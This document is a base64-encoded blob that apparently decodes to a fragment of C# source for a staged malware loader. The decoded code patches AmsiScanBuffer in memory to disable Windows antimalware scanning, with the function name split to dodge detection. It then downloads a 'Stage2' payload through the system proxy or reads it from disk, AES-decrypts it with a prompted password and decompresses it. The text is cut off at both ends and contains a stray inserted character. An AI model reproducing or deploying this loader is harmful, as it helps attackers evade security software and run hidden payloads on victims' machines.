AIgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHYAYQByACAAYQBkAGQAcgAgAD0AIABXAGkAbgAzADIALgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABsAGkAYgAsACAAQQBtACsAcwBpAFMAYwBhAG4AKwBCAHUAZgBmAGUAcgApADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAaQBuAHQAIABvAGwAZABQAHIAbwB0AGUAYwB0ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwBpAG4AMwAyAC4AVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAYQBkAGQAcgAsACAAKABVAEkAbgB0AFAAdAByACkAcABhAHQAYwBoAC4ATABlAG4AZwB0AGgALAAgADAAeAA0ADAALAAgAG8AdQB0ACAAbwBsAGQAUAByAG8AdABlAGMAdAApADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAE0AYQByAHMAaABhAGwALgBDAG8AcAB5ACgAcABhAHQAYwBoACwAIAAwACwAIABhAGQAZAByACwAIABwAGEAdABjAGgALgBMAG"U"AbgBnAHQAaAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAAgACgARQB4AGMAZQBwAHQAaQBvAG4AIABlACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQwBvAG4AcwBvAGwAZQAuAFcAcgBpAHQAZQBMAGkAbgBlACgAIgAgAFsAeABdACAAewAwAH0AIgAsACAAZQAuAE0AZQBzAHMAYQBnAGUAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBXAHIAaQB0AGUATABpAG4AZQAoACIAIABbAHgAXQAgAHsAMAB9ACIALAAgAGUALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4AKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoADQAKACAAIAAgACAAIAAgACAAIABwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABiAG8AbwBsACAAaQBzADYANABCAGkAdAAoACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAG8AbwBsACAAaQBzADYANABCAGkAdAAgAD0AIAB0AHIAdQBlADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoAEkAbgB0AFAAdAByAC4AUwBpAHoAZQAgAD0APQAgADQAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAHMANgA0AEIAaQB0ACAAPQAgAGYAYQBsAHMAZQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABpAHMANgA0AEIAaQB0ADsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBsAGEAcwBzACAAVwBpAG4AMwAyAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEwAbwBhAGQATABpAGIAcgBhAHIAeQAoAHMAdAByAGkAbgBnACAAbgBhAG0AZQApADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFAAcgBvAGcAcgBhAG0ADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAUAByAGkAbgB0AEIAYQBuAG4AZQByACgAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAEcAZQB0AF8AUwB0AGEAZwBlADIAKABzAHQAcgBpAG4AZwAgAHUAcgBsACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB0AHIAeQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABtAHkAVwBlAGIAUgBlAHEAdQBlAHMAdAAgAD0AIAAoAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdAApAFcAZQBiAFIAZQBxAHUAZQBzAHQALgBDAHIAZQBhAHQAZQAoAHUAcgBsACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAFcAZQBiAFAAcgBvAHgAeQAgAHcAZQBiAFAAcgBvAHgAeQAgAD0AIABtAHkAVwBlAGIAUgBlAHEAdQBlAHMAdAAuAFAAcgBvAHgAeQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAdwBlAGIAUAByAG8AeAB5ACAAIQA9ACAAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB3AGUAYgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUALgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABtAHkAVwBlAGIAUgBlAHEAdQBlAHMAdAAuAFAAcgBvAHgAeQAgAD0AIAB3AGUAYgBQAHIAbwB4AHkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlACAAcgBlAHMAcABvAG4AcwBlACAAPQAgACgASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAKQBtAHkAVwBlAGIAUgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBlAGEAbQAgAGQAYQB0AGEAIAA9ACAAcgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAdAByAGkAbgBnACAAaAB0AG0AbAAgAD0AIABTAHQAcgBpAG4AZwAuAEUAbQBwAHQAeQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAIABzAHIAIAA9ACAAbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAGQAYQB0AGEAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABoAHQAbQBsACAAPQAgAHMAcgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABoAHQAbQBsADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAAgACgARQB4AGMAZQBwAHQAaQBvAG4AKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4ARgBvAHIAZQBnAHIAbwB1AG4AZABDAG8AbABvAHIAIAA9ACAAQwBvAG4AcwBvAGwAZQBDAG8AbABvAHIALgBSAGUAZAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBXAHIAaQB0AGUATABpAG4AZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAFwAbgBbACEAXQAgAFcAaABvAG8AcABzACwAIAB0AGgAZQByAGUAIAB3AGEAcwAgAGEAIABpAHMAcwB1AGUAIAB3AGkAdABoACAAdABoAGUAIAB1AHIAbAAuAC4ALgAiACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AUgBlAHMAZQB0AEMAbwBsAG8AcgAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAG4AdQBsAGwAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABHAGUAdABfAFMAdABhAGcAZQAyAGQAaQBzAGsAKABzAHQAcgBpAG4AZwAgAGYAaQBsAGUAcABhAHQAaAApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcwB0AHIAaQBuAGcAIABmAG8AbABkAGUAcgBQAGEAdABoAFQAbwBCAGkAbgBhAHIAeQAgAD0AIABmAGkAbABlAHAAYQB0AGgAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcwB0AHIAaQBuAGcAIABiAGEAcwBlADYANAAgAD0AIABTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUALgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKABmAG8AbABkAGUAcgBQAGEAdABoAFQAbwBCAGkAbgBhAHIAeQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYgBhAHMAZQA2ADQAOwANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYgB5AHQAZQBbAF0AIABBAEUAUwBfAEQAZQBjAHIAeQBwAHQAKABiAHkAdABlAFsAXQAgAGIAeQB0AGUAcwBUAG8AQgBlAEQAZQBjAHIAeQBwAHQAZQBkACwAIABiAHkAdABlAFsAXQAgAHAAYQBzAHMAdwBvAHIAZABCAHkAdABlAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQB0AGUAWwBdACAAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACAAPQAgAG4AdQBsAGwAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5AHQAZQBbAF0AIABzAGEAbAB0AEIAeQB0AGUAcwAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwBdACAAewAgADEALAAgADIALAAgADMALAAgADQALAAgADUALAAgADYALAAgADcALAAgADgAIAB9ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AIABtAHMAIAA9ACAAbgBlAHcAIABNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAFIAaQBqAG4AZABhAGUAbABNAGEAbgBhAGcAZQBkACAAQQBFAFMAIAA9ACAAbgBlAHcAIABSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABBAEUAUwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBFAFMALgBCAGwAbwBjAGsAUwBpAHoAZQAgAD0AIAAxADIAOAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGsAZQB5ACAAPQAgAG4AZQB3ACAAUgBmAGMAMgA4ADkAOABEAGUAcgBpAHYAZQBCAHkAdABlAHMAKABwAGEAcwBzAHcAbwByAGQAQgB5AHQAZQBzACwAIABzAGEAbAB0AEIAeQB0AGUAcwAsACAAMQAwADAAMAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEEARQBTAC4ASwBlAHkAIAA9ACAAawBlAHkALgBHAGUAdABCAHkAdABlAHMAKABBAEUAUwAuAEsAZQB5AFMAaQB6AGUAIAAvACAAOAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEEARQBTAC4ASQBWACAAPQAgAGsAZQB5AC4ARwBlAHQAQgB5AHQAZQBzACgAQQBFAFMALgBCAGwAbwBjAGsAUwBpAHoAZQAgAC8AIAA4ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBFAFMALgBNAG8AZABlACAAPQAgAEMAaQBwAGgAZQByAE0AbwBkAGUALgBDAEIAQwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAHYAYQByACAAYwBzACAAPQAgAG4AZQB3ACAAQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AKABtAHMALAAgAEEARQBTAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApACwAIABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AVwByAGkAdABlACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABjAHMALgBXAHIAaQB0AGUAKABiAHkAdABlAHMAVABvAEIAZQBEAGUAYwByAHkAcAB0AGUAZAAsACAAMAAsACAAYgB5AHQAZQBzAFQAbwBCAGUARABlAGMAcgB5AHAAdABlAGQALgBMAGUAbgBnAHQAaAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBzAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABkAGUAYwByAHkAcAB0AGUAZABCAHkAdABlAHMAIAA9ACAAbQBzAC4AVABvAEEAcgByAGEAeQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABjAGEAdABjAGgADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4ARgBvAHIAZQBnAHIAbwB1AG4AZABDAG8AbABvAHIAIAA9ACAAQwBvAG4AcwBvAGwAZQBDAG8AbABvAHIALgBSAGUAZAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAFsAIQBdACAAVwBoAG8AbwBwAHMALAAgAHMAbwBtAGUAdABoAGkAbgBnACAAdwBlAG4AdAAgAHcAcgBvAG4AZwAuAC4ALgAgAFAAcgBvAGIAYQBiAGwAeQAgAGEAIAB3AHIAbwBuAGcAIABQAGEAcwBzAHcAbwByAGQALgAiACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQwBvAG4AcwBvAGwAZQAuAFIAZQBzAGUAdABDAG8AbABvAHIAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzADsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABiAHkAdABlAFsAXQAgAEcAZQB0AFIAYQBuAGQAbwBtAEIAeQB0AGUAcwAoACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAG4AdAAgAF8AcwBhAGwAdABTAGkAegBlACAAPQAgADQAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5AHQAZQBbAF0AIABiAGEAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAXwBzAGEAbAB0AFMAaQB6AGUAXQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABSAE4ARwBDAHIAeQBwAHQAbwBTAGUAcgB2AGkAYwBlAFAAcgBvAHYAaQBkAGUAcgAuAEMAcgBlAGEAdABlACgAKQAuAEcAZQB0AEIAeQB0AGUAcwAoAGIAYQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYgBhADsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGIAeQB0AGUAWwBdACAARABlAGMAbwBtAHAAcgBlAHMAcwAoAGIAeQB0AGUAWwBdACAAZABhAHQAYQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdQBzAGkAbgBnACAAKAB2AGEAcgAgAGMAbwBtAHAAcgBlAHMAcwBlAGQAUwB0AHIAZQBhAG0AIAA9ACAAbgBlAHcAIABNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoAGQAYQB0AGEAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAHYAYQByACAAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAAbgBlAHcAIABHAFoAaQBwAFMAdAByAGUAYQBtACgAYwBvAG0AcAByAGUAcwBzAGUAZABTAHQAcgBlAGEAbQAsACAAQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUALgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdQBzAGkAbgBnACAAKAB2AGEAcgAgAHIAZQBzAHUAbAB0AFMAdAByAGUAYQBtACAAPQAgAG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAApACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdgBhAHIAIABiAHUAZgBmAGUAcgAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwAzADIANwA2ADgAXQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAbgB0ACAAcgBlAGEAZAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHcAaABpAGwAZQAgACgAKAByAGUAYQBkACAAPQAgAHoAaQBwAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoAGIAdQBmAGYAZQByACwAIAAwACwAIABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAKQAgAD4AIAAwACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQBzAHUAbAB0AFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAYgB1AGYAZgBlAHIALAAgADAALAAgAHIAZQBhAGQAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABTAHQAcgBlAGEAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGIAeQB0AGUAWwBdACAAQgBhAHMAZQA2ADQAXwBEAGUAYwBvAGQAZQAoAHMAdAByAGkAbgBnACAAZQBuAGMAbwBkAGUAZABEAGEAdABhACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAdABlAFsAXQAgAGUAbgBjAG8AZABlAGQARABhAHQAYQBBAHMAQgB5AHQAZQBzACAAPQAgAEMAbwBuAHYAZQByAHQALgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAZQBuAGMAbwBkAGUAZABEAGEAdABhACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABlAG4AYwBvAGQAZQBkAEQAYQB0AGEAQQBzAEIAeQB0AGUAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAFIAZQBhAGQAUABhAHMAcwB3AG8AcgBkACgAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAdAByAGkAbgBnACAAcABhAHMAcwB3AG8AcgBkACAAPQAgACIAIgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAEsAZQB5AEkAbgBmAG8AIABpAG4AZgBvACAAPQAgAEMAbwBuAHMAbwBsAGUALgBSAGUAYQBkAEsAZQB5ACgAdAByAHUAZQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHcAaABpAGwAZQAgACgAaQBuAGYAbwAuAEsAZQB5ACAAIQA9ACAAQwBvAG4AcwBvAGwAZQBLAGUAeQAuAEUAbgB0AGUAcgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAaQBuAGYAbwAuAEsAZQB5ACAAIQA9ACAAQwBvAG4AcwBvAGwAZQBLAGUAeQAuAEIAYQBjAGsAcwBwAGEAYwBlACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBXAHIAaQB0AGUAKAAiACoAIgApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABwAGEAcwBzAHcAbwByAGQAIAArAD0AIABpAG4AZgBvAC4ASwBlAHkAQwBoAGEAcgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQAgAGkAZgAgACgAaQBuAGYAbwAuAEsAZQB5ACAAPQA9ACAAQwBvAG4AcwBvAGwAZQBLAGUAeQAuAEIAYQBjAGsAcwBwAGEAYwBlACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQBzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABwAGEAcwBzAHcAbwByAGQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcABhAHMAcwB3AG8AcgBkACAAPQAgAHAAYQBzAHMAdwBvAHIAZAAuAFMAdQBiAHMAdAByAGkAbgBnACgAMAAsACAAcABhAHMAcwB3AG8AcgBkAC4ATABlAG4AZwB0AGgAIAAtACAAMQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAbgB0ACAAcABvAHMAIAA9ACAAQwBvAG4AcwBvAGwAZQAuAEMAdQByAHMAbwByAEwAZQBmAHQAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQwBvAG4AcwBvAGwAZQAuAFMAZQB0AEMAdQByAHMAbwByAFAAbwBzAGkAdABpAG8AbgAoAHAAbwBzACAALQAgADEALAAgAEMAbwBuAHMAbwBsAGUALgBDAHUAcgBzAG8AcgBUAG8AcAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBXAHIAaQB0AGUAKAAiACAAIgApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBTAGUAdABDAHUAcgBzAG8AcgBQAG8AcwBpAHQAaQBvAG4AKABwAG8AcwAgAC0AIAAxACwAIABDAG8AbgBzAG8AbABlAC4AQwB1AHIAcwBvAHIAVABvAHAAKQA7A